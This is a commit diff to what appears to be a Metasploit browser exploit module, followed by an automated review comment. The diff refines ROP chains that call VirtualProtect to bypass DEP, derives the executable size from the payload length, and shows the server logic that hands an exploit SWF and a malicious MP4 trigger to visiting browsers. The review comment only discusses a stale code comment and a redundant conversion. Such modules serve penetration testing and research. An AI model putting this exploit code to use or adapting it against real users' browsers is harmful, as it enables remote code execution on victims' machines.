Dynamic VirtualProtect dwSize. Change output style.

This commit is contained in:
sinn3r 2012-03-11 13:49:46 -05:00
parent de888e50f0
commit 25a1552fbd
1 changed files with 13 additions and 11 deletions


@ -135,7 +135,8 @@ class Metasploit3 < Msf::Exploit::Remote
# Both ROP chains generated by mona.py - See corelan.be
case t['Rop']
when :msvcrt
print_status("Using msvcrt ROP against #{cli.peerhost}:#{cli.peerport}")
print_status("#{cli.peerhost}:#{cli.peerport} - Using msvcrt ROP")
exec_size = code.length
rop =
[
0x77c4e392, # POP EAX # RETN
@ -146,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote
0x77c4ec00, # POP EBP # RETN
0x77c35459, # ptr to 'push esp # ret'
0x77c47705, # POP EBX # RETN
0x00000800, # <- change size to mark as executable if needed (-> ebx)
exec_size, # EBX
0x77c3ea01, # POP ECX # RETN
0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
0x77c46100, # POP EDI # RETN
@ -154,16 +155,17 @@ class Metasploit3 < Msf::Exploit::Remote
0x77c4d680, # POP EDX # RETN
0x00000040, # newProtect (0x40) (-> edx)
0x77c4e392, # POP EAX # RETN
nop, # NOPS (-> eax)
nop, # NOPS (-> eax)
0x77c12df9, # PUSHAD # RETN
].pack("V*")
when :jre
print_status("Using JRE ROP against #{cli.peerhost}:#{cli.peerport}")
print_status("#{cli.peerhost}:#{cli.peerport} - Using JRE ROP")
exec_size = [0-code.length].pack('V').unpack('L')[0].to_i
rop =
[
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
exec_size, # Value to negate, will become 0x00000201 (dwSize)
0x7c347f98, # RETN (ROP NOP)
0x7c3415a2, # JMP [EAX]
0xffffffff,
@ -217,23 +219,23 @@ class Metasploit3 < Msf::Exploit::Remote
# Avoid the attack if the victim doesn't have the same setup we're targeting
if my_target.nil?
print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")
send_not_found(cli)
return
end
print_status("#{cli.peerhost}:#{cli.peerport} Client requesting: #{request.uri}")
print_status("#{cli.peerhost}:#{cli.peerport} - Client requesting: #{request.uri}")
# The SWF requests our MP4 trigger
if request.uri =~ /\.mp4$/
print_status("#{cli.peerhost}:#{cli.peerport} Sending MP4...")
print_status("#{cli.peerhost}:#{cli.peerport} - Sending MP4...")
mp4 = create_mp4(my_target)
send_response(cli, mp4, {'Content-Type'=>'video/mp4'})
return
end
if request.uri =~ /\.swf$/
print_status("#{cli.peerhost}:#{cli.peerport} Sending Exploit SWF...")
print_status("#{cli.peerhost}:#{cli.peerport} - Sending Exploit SWF...")
send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })
return
end
@ -305,7 +307,7 @@ pluginspage="http://www.macromedia.com/go/getflashplayer">
end
add_resource({'Path'=>'/test.mp4', 'Proc'=>proc}) rescue nil
print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...")
print_status("#{cli.peerhost}:#{cli.peerport} - Sending html")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
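Review bot: The comment on the new `exec_size` entry in the :jre chain still reads `will become 0x00000201 (dwSize)`, which described the constant `0xfffffdff` it replaces; now that the value is derived from `code.length` the comment is wrong on its face and should read `exec_size, # Value to negate, becomes code.length (dwSize)`. The line that computes it, `exec_size = [0-code.length].pack('V').unpack('L')[0].to_i`, also deserves a why-comment such as `# code.length as an unsigned 32-bit two's complement; the chain negates it back` — the msvcrt branch passes `code.length` directly while this branch pre-negates it, and the asymmetry is not explained anywhere in the section. The trailing `.to_i` is redundant, since `unpack('L')[0]` already yields an Integer. The enclosing methods start and end outside this section's hunks.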